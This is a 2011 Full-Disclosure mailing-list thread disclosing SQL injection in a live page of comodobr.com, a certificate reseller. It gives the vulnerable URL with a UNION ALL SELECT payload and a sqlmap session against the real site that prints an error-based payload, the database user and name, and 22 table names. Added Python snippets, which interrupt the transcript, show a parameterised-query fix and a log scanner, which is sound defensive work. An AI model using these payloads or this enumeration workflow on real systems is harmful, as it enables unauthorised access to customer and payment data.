Received: from [199.48.147.35] by web120908.mail.ne1.yahoo.com via HTTP;
Sun, 22 May 2011 11:20:54 PDT
X-Mailer: YahooMailClassic/14.0.1 YahooMailWebService/0.8.111.303096
Date: Sun, 22 May 2011 11:20:54 -0700 (PDT)
From: Hgkdfhklj Jdhglkjfdhg <gimmemyfiles@ymail.com>
X-Mailman-Approved-At: Sun, 22 May 2011 19:35:39 +0100
Cc: suporte@comodobr.com
Subject: [Full-disclosure] comodobr.com sqli
vulnerable link:
https://www.comodobr.com/comprar/compra_codesigning.php?prod=8 UNION ALL
SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14 -- -
http://pastebin.com/9qwdL1pA
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
---------------------------------------------------------------------
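The link in the post is the whole bug: the `prod` value from the query string is pasted straight into a SQL statement, so a `UNION ALL SELECT` after the number becomes part of the query. The Python below is an added example, not code from the advisory or from the comodobr.com PHP application; it models the product lookup with a constructed in-memory SQLite table (hypothetical `prods` schema, invented rows) and puts the concatenated query next to the parameterised one with input validation.

```python
import re
import sqlite3

# Constructed sample data: a hypothetical products table standing in for the
# shop's real schema, which the advisory does not show.
PRODUCTS = [
    (7, "SSL Certificate", 9900),
    (8, "Code Signing Certificate", 17900),
]

# The UNION payload shape from the original post, reduced to three columns so
# it matches the constructed table (a UNION must match the column count).
PAYLOAD = "8 UNION ALL SELECT 0,1,2 -- -"


def make_db():
    """Build an in-memory SQLite database holding the constructed products."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE prods (id INTEGER PRIMARY KEY, name TEXT, price_cents INTEGER)"
    )
    conn.executemany("INSERT INTO prods VALUES (?, ?, ?)", PRODUCTS)
    conn.commit()
    return conn


def vulnerable_lookup(conn, prod):
    """The defective pattern: the request parameter is pasted into the SQL text.

    Everything after the number is parsed as SQL, so a UNION appends rows the
    application never intended to return.
    """
    sql = "SELECT id, name, price_cents FROM prods WHERE id = " + prod
    return conn.execute(sql).fetchall()


def safe_lookup(conn, prod):
    """The hardened pattern: validate the shape, then bind the value.

    The `?` placeholder sends the value separately from the SQL text, so the
    database never parses it as syntax. The up-front check is defence in
    depth: anything that is not a short decimal integer is rejected before a
    query is even built.
    """
    if not re.fullmatch(r"[0-9]{1,9}", prod):
        raise ValueError("prod must be a decimal integer")
    sql = "SELECT id, name, price_cents FROM prods WHERE id = ?"
    return conn.execute(sql, (int(prod),)).fetchall()


def rejects(conn, prod):
    """True if safe_lookup refuses the input instead of querying with it."""
    try:
        safe_lookup(conn, prod)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal input:", vulnerable_lookup(db, "8"))
    print("vulnerable, UNION input: ", vulnerable_lookup(db, PAYLOAD))
    print("safe, normal input:      ", safe_lookup(db, "8"))
    print("safe rejects UNION input:", rejects(db, PAYLOAD))
```

Run as a script, the vulnerable lookup returns the product row plus the attacker-supplied `(0, 1, 2)` row, while the parameterised version returns only the product for `8` and refuses the payload outright. In PHP the equivalent is a `PDO` or `mysqli` prepared statement with a bound integer parameter; the binding, not escaping, is what removes the bug.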
PS C:\Python27> nslookup 199.48.147.35
Server: google-public-dns-a.google.com
Address: 8.8.8.8
Name: tor-exit-router35-readme.formlessnetworking.net
Address: 199.48.147.35
>>> You're not going to find him... <<<
>>> Let's check the host: <<<
PS C:\Python27> .\python.exe C:\sqlmap-0.9\sqlmap.py --wizard
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 21:00:00
Please enter full target URL (-u): https://www.comodobr.com/comprar/compra_codesigning.php?prod=8
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1
sqlmap is running, please wait..
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: prod
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: prod=8 AND (SELECT 1198 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,109,109,58),(SELECT (CASE WHEN (1198=1198)
THEN 1 ELSE 0 END)),CHAR(58,114,117,115,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
---
[21:00:00] [INFO] retrieved: 5.0.91-community-log
web application technology: PHP 5.2.6, Apache 2.0.63
back-end DBMS: MySQL 5.0
banner: '5.0.91-community-log'
[21:00:00] [INFO] retrieved: comodobr_site@localhost
current user: 'comodobr_site@localhost'
[21:00:00] [INFO] retrieved: comodobr_comodobr
current database: 'comodobr_comodobr'
current user is DBA: 'False'
[*] shutting down at: 21:00:00
PS C:\Python27>
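The sqlmap run above confirms the injection with an error-based payload (the `COUNT(*)`, `FLOOR(RAND(0)*2)` and `GROUP BY` combination against `information_schema.tables`, which makes MySQL raise a duplicate-key error that carries data in its message). Both that payload and the `UNION ALL SELECT` from the original post leave obvious fingerprints in the web server's access log. The Python below is an added example, not part of the original post: it scans constructed Apache combined-format log lines (placeholder client IP from the 203.0.113.0/24 documentation range, invented timestamps and user-agent strings, the two request payloads quoted on this page URL-encoded) and reports which rule each suspicious request trips. The log regex and rule names are my own.

```python
import re
from urllib.parse import parse_qs, urlparse

# Apache "combined" log format (my regex, not taken from the post).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Fingerprints of the two payload shapes seen on this page, applied to the
# URL-decoded value of every query-string parameter.
RULES = {
    "union-select": re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I),
    "information-schema": re.compile(r"\binformation_schema\b", re.I),
    # MySQL error-based trick: COUNT(*) ... FLOOR(RAND(0)*2) ... GROUP BY
    # forces a duplicate-key error whose message carries the selected data.
    "mysql-rand-dupkey": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I
    ),
}

# Constructed sample lines (placeholder IP, invented timestamps/user-agents).
SAMPLE_LOG = [
    '203.0.113.10 - - [22/May/2011:11:20:54 -0700] '
    '"GET /comprar/compra_codesigning.php?prod=8 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [22/May/2011:11:21:03 -0700] '
    '"GET /comprar/compra_codesigning.php?prod=8%20UNION%20ALL%20SELECT%20'
    '0,1,2,3,4,5,6,7,8,9,10,11,12,13,14%20--%20- HTTP/1.1" 200 6011 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [22/May/2011:11:22:17 -0700] '
    '"GET /comprar/compra_codesigning.php?prod=8%20AND%20(SELECT%201198%20FROM'
    '(SELECT%20COUNT(*),CONCAT(CHAR(58,110,109,109,58),(SELECT%20(CASE%20WHEN%20'
    '(1198=1198)%20THEN%201%20ELSE%200%20END)),CHAR(58,114,117,115,58),'
    'FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) '
    'HTTP/1.1" 500 312 "-" "sqlmap/0.9"',
]


def parse_line(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_line(line):
    """Return the list of rule names a single access-log line trips."""
    rec = parse_line(line)
    if rec is None:
        return []
    hits = []
    # parse_qs URL-decodes each value, so %20 and friends cannot hide keywords.
    params = parse_qs(urlparse(rec["target"]).query, keep_blank_values=True)
    for values in params.values():
        for value in values:
            for name, pattern in RULES.items():
                if name not in hits and pattern.search(value):
                    hits.append(name)
    # sqlmap announces itself unless told otherwise; cheap but useful signal.
    if "sqlmap" in rec["ua"].lower():
        hits.append("scanner-user-agent")
    return hits


def scan_log(lines):
    """Return one finding per suspicious line: client, time, target, rules."""
    findings = []
    for line in lines:
        hits = scan_line(line)
        if hits:
            rec = parse_line(line)
            findings.append(
                {"ip": rec["ip"], "ts": rec["ts"], "target": rec["target"], "rules": hits}
            )
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["rules"])
```

The benign `prod=8` request is left alone; the UNION request trips only the `union-select` rule, and the sqlmap request trips the schema, duplicate-key and user-agent rules together. Matching on decoded parameter values rather than the raw request line is the important design choice: the raw line is what an attacker controls the encoding of.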
>>> Looks real <<<
>>> Let's see the inside of the db: <<<
web application technology: PHP 5.2.6, Apache 2.0.63
back-end DBMS: MySQL 5.0
banner: '5.0.91-community-log'
current user: 'comodobr_site@localhost'
current database: 'comodobr_comodobr'
current user is DBA: 'False'
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_associa
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_categoria
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_importado
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_status
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_confirm_pago
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_contab
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_expected_delivery_time
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_hosting_contas
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_meios_pago
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedido_status
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedido_status_codes
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedidos
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedidos_historico
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_prod_grupos
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_prods
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_resellers
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_server_software
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_users
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_vw_crm_clientes
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_webhostreport_item
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_webhostreport_subitem
Database: comodobr_comodobr
[22 tables]
+-------------------------------+
| comodo_boleto |
| comodo_boleto_associa |
| comodo_boleto_categoria |
| comodo_boleto_importado |
| comodo_boleto_status |
| comodo_confirm_pago |
| comodo_contab |
| comodo_expected_delivery_time |
| comodo_hosting_contas |
| comodo_meios_pago |
| comodo_pedido_status |
| comodo_pedido_status_codes |
| comodo_pedidos |
| comodo_pedidos_historico |
| comodo_prod_grupos |
| comodo_prods |
| comodo_resellers |
| comodo_server_software |
| comodo_users |
| comodo_vw_crm_clientes |
| comodo_webhostreport_item |
| comodo_webhostreport_subitem |
+-------------------------------+
[*] shutting down at: 21:00:00
PS C:\Python27>
When are comodo going to fix this? How come comodo is a CA? They shouldn't be trusted! And what about TÜRKTRUST.. Who the HELL are they? I don't trust them, but they are still a CA in my browser.. WHY? When are we going to see private certs from paypal, google, etc? Why does Firefox restore all my CAs when I delete them in the "Certificate Manager"? Do we *STILL* trust https? What's next?
GET YOUR SHIT TOGETHER.
EDIT: I'm not the "hacker". The "real hacker" is here: http://pastebin.com/u/gimmemyfiles
I've just checked his claims, which were true. Everyone can claim that they hacked comodo, but that the vulnerability was fixed, so all I have done is open sqlmap and test :-)
Also here's a new response:
Received: from [199.48.147.35] by web120910.mail.ne1.yahoo.com via HTTP;
Tue, 24 May 2011 14:58:39 PDT
X-Mailer: YahooMailWebService/0.8.111.303096
Date: Tue, 24 May 2011 14:58:39 -0700 (PDT)
From: Hgkdfhklj Jdhglkjfdhg <gimmemyfiles AT ymail.com>
Cc: "support@comodobr.com" <support@comodobr.com>
Subject: [Full-disclosure] My comments on comodobr.com
I have to agree with Comodo president and CEO, Melih Abdulhayoglu.
In fact, anyone that can use sqlmap or pangolin and knows how to google for "filetype:php inurl:prod" could have found that sqli.
However, the same way the security perimeter of the mainframe _should_ be extended to the desktops connected to it, it might be a good idea for resellers and partners to tighten their own security. Further compromise of comodobr.com systems (_if_possible_) could have been a foothold into Comodo's systems.
Just my 50 cents
[Edit]
The db dump was partial because the only thing omitted from the db dump was request logs. Either way, CSRs and client info shouldn't be as "readily available" as this.
No beef with comodobr.com or Comodo, just with companies in the security business that don't take care of their own.
That's one of the reasons we have been trying to make the internet secure for so long. Some people just don't help.
http://pastebin.com/MFSUdCnk
PS C:\Users\Nicolai> nslookup 199.48.147.35
Server: google-public-dns-a.google.com
Address: 8.8.8.8
Name: tor-exit-router35-readme.formlessnetworking.net
Address: 199.48.147.35
PS C:\Users\Nicolai>